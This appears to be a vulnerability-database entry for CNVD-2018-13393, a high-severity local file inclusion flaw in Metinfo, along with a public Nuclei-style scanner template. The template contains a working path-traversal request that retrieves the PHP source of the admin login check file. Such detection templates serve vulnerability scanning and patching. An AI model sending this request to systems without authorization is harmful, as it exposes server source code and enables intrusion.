漏洞描述
Metinfo is susceptible to local file inclusion.
CNVD-2018-13393: Metinfo - Local File Inclusion
PoC代码[已公开]
id: CNVD-2018-13393
info:
name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi,vuln
http:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and
# digest: 490a004630440220355b8b9a858cbe7d2332a037563a7d4710e4837de8b9eefee8429267b0e904f202205a167c0ec395423393be593886541e50268ab496ee1273a1c6fa389abc03c3db:922c64590222798bb761d5b6d8e72950